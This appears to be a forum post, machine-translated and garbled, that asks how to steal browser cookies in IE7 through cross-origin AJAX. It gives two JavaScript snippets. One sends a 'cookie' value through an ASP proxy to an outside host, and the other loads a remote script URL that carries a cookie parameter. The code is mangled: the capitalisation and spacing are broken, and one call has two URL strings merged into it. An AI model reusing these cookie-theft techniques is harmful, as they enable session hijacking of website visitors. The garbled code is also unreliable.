TeN. potgnayiaH. wwW vbs small shop
I have tested the Code mentioned in many articles on the Internet that uses ajax to steal cookies. It can only be used in IE6 and cannot be used in IE7. One afternoon of study, the first challenge was ajax cross-Origin data submission, which can be solved by web Proxy,Http: // 192.168.8.108A.htm code:
<Script>
Function getXmlHttpRequest (){
If (window. ActiveXObject ){
Var ieArr = ["Msxml2.XMLHTTP", "Microsoft. XMLHTTP"];
For (var I = 0; I <ieArr. length; I ++)
{
Var xmlhttp = new ActiveXObject (ieArr [I]);
}
Return xmlhttp;
} Else if (window. XMLHttpRequest ){
Return new XMLHttpRequest ();
}
}
Var xmlHttp = getXmlHttpRequest ();
XmlHttp. Open ("get", "asp/web. asp? Url = http://87487575.com/2.asp? = Mmm ", true>Http: // 192.168.8.108/asp/web. asp? Url = http://8888.com/2.asp? Cookie = mmm ", true);
XmlHttp. send (null)
</Script>
Web. asp is an asp proxy.
Direct AccessHttp: // 192.168.8.108/a.htmYes, data can be sent successfully. However, in cross-site scenarios, if we want to cross the site of 192.168.8.108, we certainly cannot put a web. asp on top, so this approach is not feasible.
In addition, iframe tags are usually used for Cross-Site cookie Stealing in other ie7.0 scenarios. If ajax is not successfully sent, another cross-site approach is found after searching, you do not need to use iframe for cross-origin submission. The Code is as follows:
<Script LANGUAGE = "Javascript" src = "" id = "get">
</Script>
<Script LANGUAGE = "Javascript">
<! --
Function get (url)
{
Var obj = document. getElementById ("get ");
Obj. src = url;
(Obj. readStatus = 200)
{
Eval (alert ("OK "));
}
}
Get ("Http://8888.com/2.asp? Cookie = 12345678")
/* Function query ()
{
Get ("Http://8888.com/web/1.img"); // You can write code here. For example, replace OK in alert (" OK ") with a variable. The code in 1.img is var OK =" 123"
}
// -->
*/
</Script>
For other better methods, we are welcome to discuss how to steal cookies through ajax cross-origin in IE7.